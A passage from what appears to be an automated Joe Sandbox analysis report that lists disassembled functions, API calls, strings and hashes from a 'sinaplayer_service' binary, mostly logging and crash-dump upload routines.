                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037CD73
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037CD84
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037CD9E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037CDAF
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037CDB7
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037CDD5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037CDE4
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CE35
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CE41
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CE4D
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037CEA5
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037CEB8
                                                                                                                                                                                                    • ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z.BASE(?,00000001), ref: 0037CEDA
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0037CEE4
                                                                                                                                                                                                    • ?BaseName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037CEFB
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV12@@Z.BASE(?,00000000), ref: 0037CF0D
                                                                                                                                                                                                    • ?Move@base@@YA_NABVFilePath@1@0@Z.BASE(?,00000000), ref: 0037CF19
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CF2E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CF3B
                                                                                                                                                                                                    • ?BaseName@FilePath@base@@QBE?AV12@XZ.BASE(?), ref: 0037CF4B
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV12@@Z.BASE(?,00000000), ref: 0037CF5D
                                                                                                                                                                                                    • ?CopyFileW@base@@YA_NABVFilePath@1@0@Z.BASE(?,00000000), ref: 0037CF69
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CF7F
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CF88
                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,0039DEB0,0039DEA4,00000004), ref: 0037CFB2
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037CFE9
                                                                                                                                                                                                    • ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z.BASE(?,00000000,?,?,?,?,?), ref: 0037D023
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?,?,?,?), ref: 0037D04E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037D062
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037D073
                                                                                                                                                                                                    • memmove.MSVCR120(?,FFFFFFFF,?), ref: 0037D0E2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$File$Path@base@@$??6?$basic_ostream@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@V12@$?width@ios_base@std@@W@base@@$??3@Append@U?$char_traits@_$?sputc@?$basic_streambuf@BaseDeleteName@Path@1@0@Path@1@_V01@_V12@@W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CopyCountCreateCurrentD@std@@@1@@DebugDirectoryMessageMove@base@@Osfx@?$basic_ostream@OutputPath@1@@StringThreadTickUnlock@?$basic_streambuf@V01@@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@memmove
                                                                                                                                                                                                    • String ID: need_retry = $)#sinaclient#[$)- $UploadMgr::TaskComplete upload_suc = $dmp_backup$open$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3136150174-2007185669
                                                                                                                                                                                                    • Opcode ID: 21a089594ce684e8a37bf9e9df4bf69a248dc7bb8607cf81fa173a94ff7ef40e
                                                                                                                                                                                                    • Instruction ID: 575f3497ce53e65ef79b5a53455438efd960ff0a7335d498c4af89c0bd1f7c92
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21a089594ce684e8a37bf9e9df4bf69a248dc7bb8607cf81fa173a94ff7ef40e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0E17C71900218DFDF22DFA4DD4ABDDBBB8BF15304F144199E809AB292DB356A48CF61
                                                                                                                                                                                                    Function 0037EAB0 Relevance: 77.3, APIs: 37, Strings: 7, Instructions: 280threadwindowsynchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037EAFE
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037EB22
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037EB5C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037EB96
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037EBB3
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037EBD0
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037EBF3
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037EC04
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037EC1E
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037EC42
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037EC4D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037EC9E
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ECAA
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ECB3
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000002,00000032), ref: 0037ECC5
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037ECF3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037ED17
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037ED51
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037ED8B
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037EDA8
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037EDC5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037EDE8
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037EDF9
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE13
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE31
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE3C
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE8D
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EE99
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EEA5
                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000002,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EEB0
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037EEBE
                                                                                                                                                                                                    • ?Alias@debug@base@@YAXPBX@Z.BASE(?), ref: 0037EED1
                                                                                                                                                                                                    • ?Alias@debug@base@@YAXPBX@Z.BASE(?), ref: 0037EED7
                                                                                                                                                                                                    • ?Alias@debug@base@@YAXPBX@Z.BASE(?), ref: 0037EEE3
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(upload_thread.cpp,00000049,00000004), ref: 0037EEF7
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0037EF2D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000002), ref: 0037EF36
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$Alias@debug@base@@ThreadU?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?sputc@?$basic_streambuf@CountCurrentD@std@@@1@@DebugMessage@logging@@OutputStringTickV01@@$?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CloseErrorHandleLastObjectOsfx@?$basic_ostream@SingleTerminateWait
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $Check failed: false. $UploadThread::Join$UploadThread::Join WAIT_TIMEOUT kill thread$upload_thread.cpp$Vll
                                                                                                                                                                                                    • API String ID: 2929787548-2334612836
                                                                                                                                                                                                    • Opcode ID: 3c9364741d876eaf3d1bbeb4ed626368a0827153fcf38c32b52aeaa6d03c5e42
                                                                                                                                                                                                    • Instruction ID: ae55b67e3a7eef3aa6a217cb05e027a5e8efa0e2382ce94c58ed9bbb7128ec97
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c9364741d876eaf3d1bbeb4ed626368a0827153fcf38c32b52aeaa6d03c5e42
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9FC161B5D00208ABCF22DFA4ED4ABDDBBB8FB08305F008595E50DA7291DB759A48CF51
                                                                                                                                                                                                    Function 0037B110 Relevance: 73.8, APIs: 34, Strings: 8, Instructions: 300windowtimethreadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,?,?,?), ref: 0037B165
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000,?,?,?), ref: 0037B189
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?), ref: 0037B1C3
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037B1FE
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037B224
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?), ref: 0037B23D
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?), ref: 0037B260
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?), ref: 0037B271
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 003762A3
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762BA
                                                                                                                                                                                                      • Part of subcall function 00376260: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 003762CB
                                                                                                                                                                                                      • Part of subcall function 00376260: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00376402
                                                                                                                                                                                                      • Part of subcall function 00376260: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 0037640F
                                                                                                                                                                                                      • Part of subcall function 00376260: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 0037641C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 0037642C
                                                                                                                                                                                                      • Part of subcall function 00376260: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00376440
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B294
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037B2B2
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037B2C1
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B312
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B31E
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B32A
                                                                                                                                                                                                    • ?GetMinLogLevel@logging@@YAHXZ.BASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B330
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(upload_mgr.cpp,000000FF,00000000), ref: 0037B34C
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120(?, StartReport url = ,00000000), ref: 0037B36D
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B39A
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B3BA
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037B3DC
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0037B416
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037B441
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037B45A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037B460
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000008C,?,00000000), ref: 0037B46A
                                                                                                                                                                                                      • Part of subcall function 0037E870: ??0SimpleThread@base@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(?,8285FFAB,00000000,00000000,00000000,0039A4C4,000000FF,?,0037B4A4,00000000,00000000,?,?,?,?,00000000), ref: 0037E89C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,00000000), ref: 0037B4C0
                                                                                                                                                                                                    • ?FromSeconds@TimeDelta@base@@SA?AV12@_J@Z.BASE(?,0000001E,00000000,?,0037C4A0,?,?,?,?,00000000), ref: 0037B516
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE ref: 0037B524
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(UploadMgr::StartStat,upload_mgr.cpp,00000108,00000000), ref: 0037B53D
                                                                                                                                                                                                    • ?PostDelayedTask@MessageLoop@base@@QAEXABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@VTimeDelta@2@@Z.BASE(?,00000000,00000000,?), ref: 0037B55F
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0037B56C
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B5BB
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B5C7
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B5D3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
